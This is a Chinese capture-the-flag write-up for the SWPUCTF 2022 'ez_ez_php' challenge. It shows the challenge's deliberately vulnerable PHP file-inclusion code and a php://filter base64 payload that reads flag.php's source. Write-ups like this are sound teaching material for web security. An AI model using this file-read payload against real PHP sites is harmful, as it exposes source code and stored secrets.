[SWPUCTF 2022 新生赛]ez_ez_php

[SWPUCTF 2022 新生赛]ez_ez_php wp

题目代码如下:

复制代码
 <?php
error_reporting(0);
if (isset($_GET['file'])) {
    if ( substr($_GET["file"], 0, 3) === "php" ) {
        echo "Nice!!!";
        include($_GET["file"]);
    } 

    else {
        echo "Hacker!!";
    }
}else {
    highlight_file(__FILE__);
}
//flag.php

根据代码,GET 传入的参数要以 php 开头,并且提示有一个 flag.php 文件。那就直接用 php 伪协议。

php://filter 伪协议

payload

复制代码
file=php://filter/read=convert.base64-encode/resource=flag.php

返回结果:

base64 解码后得到 flag.php 文件内容:

这里有些乱码,但可以看得出来提示:真正的 flag 在名为 'flag' 的文件里面。

那就用伪协议再读一次:

拿到 flag 。

相关推荐
青茶3603 小时前
php怎么实现订单接口状态轮询(二)
前端·php·接口
一分半心动4 小时前
宝塔面板lnmp架构,tp6框架网站伪静态
nginx·php
枷锁—sha4 小时前
【SRC】SQL注入快速判定与应对策略(一)
网络·数据库·sql·安全·网络安全·系统安全
Hao.Zhou5 小时前
phpstudy 进行 composer 全局配置
php·composer
zorro_z6 小时前
ThinkPHP8学习篇(十六):错误调试与辅助组件
php
liann1197 小时前
3.1_网络——基础
网络·安全·web安全·http·网络安全
独行soc7 小时前
2026年渗透测试面试题总结-17(题目+回答)
android·网络·安全·web安全·渗透测试·安全狮
独行soc8 小时前
2026年渗透测试面试题总结-18(题目+回答)
android·网络·安全·web安全·渗透测试·安全狮
ESBK20259 小时前
第四届移动互联网、云计算与信息安全国际会议(MICCIS 2026)二轮征稿启动,诚邀全球学者共赴学术盛宴
大数据·网络·物联网·网络安全·云计算·密码学·信息与通信
旺仔Sec9 小时前
一文带你看懂免费开源 WAF 天花板!雷池 (SafeLine) 部署与实战全解析
web安全·网络安全·开源·waf